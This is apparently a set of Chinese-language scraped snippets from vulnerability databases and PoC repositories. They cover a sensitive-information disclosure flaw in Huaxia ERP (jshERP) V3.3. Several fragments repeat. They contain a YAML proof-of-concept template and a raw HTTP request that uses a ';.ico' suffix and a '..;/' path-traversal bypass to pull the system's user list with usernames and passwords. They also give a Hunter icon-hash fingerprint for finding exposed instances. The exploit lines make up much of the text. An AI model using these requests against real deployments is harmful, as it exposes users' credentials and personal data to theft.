华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。 2.漏洞描述 华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息。
1 + name: poc-yaml-华夏ERP-Sensitive-information 2 + description: "用户名和密码敏感漏洞" 3 + method: GET 4 + path: 5 + - "/jshERP-boot/user/getAllList;.ico" 6 + expression: 7 + status: 200 8 + body_any: 9 + - "userList" 10 + - "code" 0 commit comments ...
华夏ERPV3.3存在信息泄漏漏洞 华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。 hunter web.icon=="f6efcd53ba2b07d67ab993073c238a11" poc GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Wi...
同时对角色和权限进行了细致全面,精确到每个按钮和菜单。该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息。 厂商: 开放源代码项目 影响产品: 华夏ERP 补丁文件: 暂无 其他修复方法: 安装补丁 缓解方案: 无...
1 + name: poc-yaml-华夏ERP-Sensitive-information 2 + description: "用户名和密码敏感漏洞" 3 + method: GET 4 + path: 5 + - "/jshERP-boot/user/getAllList;.ico" 6 + expression: 7 + status: 200 8 + body_any: 9 + - "userList" 10 + - "code" 0 commit comments ...
华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。hunterweb.icon=="f6efcd53ba2b07d67ab993073c238a11"pocGET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...